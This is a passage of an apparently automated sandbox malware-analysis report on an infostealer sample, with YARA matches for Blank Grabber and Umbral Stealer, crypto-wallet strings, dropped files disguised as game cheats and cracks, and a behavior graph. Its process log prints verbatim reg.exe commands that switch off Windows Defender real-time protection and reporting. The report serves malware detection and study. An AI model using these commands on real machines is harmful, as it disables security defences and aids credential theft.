Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disable Windows Defender real time protection (registry)
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Registry value created: DisableAntiSpyware 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Registry value created: DisableAntiVirus 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Mpuser Registry value created: MpEnablePus 0 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableBehaviorMonitoring 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Registry value created: DisableAntiSpyware 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Registry value created: DisableAntiVirus 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableOnAccessProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Mpuser Registry value created: MpEnablePus 0
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableBehaviorMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableScanOnRealtimeEnable 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting Registry value created: DisableEnhancedNotifications 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet Registry value created: DisableBlockAtFirstSeen 1

Stealing of Sensitive Information
barindex
Yara detected Blank Grabber
Source: Yara match File source: wKj1CBkbos.exe, type: SAMPLE
Source: Yara match File source: 2.0.52cheatand52rat.exe.1bc02440000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wKj1CBkbos.exe.13e55f0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.wKj1CBkbos.exe.40936c.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wKj1CBkbos.exe.13e55f0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.wKj1CBkbos.exe.40936c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000000.2138750584.000001BC02442000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.2133151338.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wKj1CBkbos.exe PID: 5280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 52cheatand52rat.exe PID: 4420, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPED
Yara detected Umbral Stealer
Source: Yara match File source: wKj1CBkbos.exe, type: SAMPLE
Source: Yara match File source: 2.0.52cheatand52rat.exe.1bc02440000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wKj1CBkbos.exe.13e55f0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.wKj1CBkbos.exe.40936c.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wKj1CBkbos.exe.13e55f0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.wKj1CBkbos.exe.40936c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000000.2138750584.000001BC02442000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.2133151338.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wKj1CBkbos.exe PID: 5280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 52cheatand52rat.exe PID: 4420, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPED
Found many strings related to Crypto-Wallets (likely being stolen)
Source: wKj1CBkbos.exe, 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Electrum
Source: wKj1CBkbos.exe, 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: BytecoinJaxx!com.liberty.jaxx
Source: wKj1CBkbos.exe, 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Exodus
Source: wKj1CBkbos.exe, 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Ethereum
Source: wKj1CBkbos.exe, 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: wKj1CBkbos.exe PID: 5280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 52cheatand52rat.exe PID: 4420, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Blank Grabber
Source: Yara match File source: wKj1CBkbos.exe, type: SAMPLE
Source: Yara match File source: 2.0.52cheatand52rat.exe.1bc02440000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wKj1CBkbos.exe.13e55f0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.wKj1CBkbos.exe.40936c.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wKj1CBkbos.exe.13e55f0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.wKj1CBkbos.exe.40936c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000000.2138750584.000001BC02442000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.2133151338.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wKj1CBkbos.exe PID: 5280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 52cheatand52rat.exe PID: 4420, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPED
Yara detected Umbral Stealer
Source: Yara match File source: wKj1CBkbos.exe, type: SAMPLE
Source: Yara match File source: 2.0.52cheatand52rat.exe.1bc02440000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wKj1CBkbos.exe.13e55f0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.wKj1CBkbos.exe.40936c.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wKj1CBkbos.exe.13e55f0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.wKj1CBkbos.exe.40936c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000000.2138750584.000001BC02442000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.2133151338.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wKj1CBkbos.exe PID: 5280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 52cheatand52rat.exe PID: 4420, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545326 Sample: wKj1CBkbos.exe Startdate: 30/10/2024 Architecture: WINDOWS Score: 100 59 ip-api.com 2->59 61 fp2e7a.wpc.phicdn.net 2->61 63 2 other IPs or domains 2->63 67 Found malware configuration 2->67 69 Malicious sample detected (through community Yara rule) 2->69 71 Antivirus detection for dropped file 2->71 73 13 other signatures 2->73 9 wKj1CBkbos.exe 4 2->9         started        signatures3 process4 file5 51 C:\Users\user\...\Primordial Crack.exe, PE32 9->51 dropped 53 C:\Users\user\AppData\...\52cheatand52rat.exe, PE32 9->53 dropped 55 C:\Users\user\...\windows defender.bat, ASCII 9->55 dropped 91 Found many strings related to Crypto-Wallets (likely being stolen) 9->91 93 Creates files with lurking names (e.g. Crack.exe) 9->93 13 cmd.exe 1 9->13         started        16 Primordial Crack.exe 2 9->16         started        19 52cheatand52rat.exe 14 3 9->19         started        signatures6 process7 dnsIp8 95 Uses cmd line tools excessively to alter registry or file data 13->95 97 Uses schtasks.exe or at.exe to add and modify task schedules 13->97 22 reg.exe 1 1 13->22         started        25 reg.exe 1 1 13->25         started        27 reg.exe 1 1 13->27         started        36 18 other processes 13->36 49 C:\Users\user\AppData\...\Lunch LaCheatV2.exe, PE32 16->49 dropped 29 cmd.exe 1 16->29         started        31 Lunch LaCheatV2.exe 2 16->31         started        65 ip-api.com 208.95.112.1, 49711, 49758, 80 TUT-ASUS United States 19->65 99 Antivirus detection for dropped file 19->99 101 Multi AV Scanner detection for dropped file 19->101 103 Machine Learning detection for dropped file 19->103 34 WMIC.exe 1 19->34         started        file9 signatures10 process11 file12 75 Disables Windows Defender (deletes autostart) 22->75 77 Disable Windows Defender real time protection (registry) 22->77 79 Uses cmd line tools excessively to alter registry or file data 29->79 38 reg.exe 29->38         started        41 reg.exe 29->41         started        43 reg.exe 29->43         started        47 12 other processes 29->47 57 C:\Users\user\AppData\...\Lunch LaCheat.exe, PE32 31->57 dropped 81 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 31->81 83 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 31->83 85 Hides threads from debuggers 31->85 45 conhost.exe 34->45         started        signatures13 process14 signatures15 87 Disables Windows Defender (deletes autostart) 38->87 89 Disable Windows Defender real time protection (registry) 38->89
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
208.95.112.1
 ip-api.com United States
53334 TUT-ASUS true

Contacted Domains

Name IP Active
bg.microsoft.map.fastly.net 199.232.214.172 true
ip-api.com 208.95.112.1 true
fp2e7a.wpc.phicdn.net 192.229.221.95 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://ip-api.com/line/?fields=hosting false
  • URL Reputation: safe
 unknown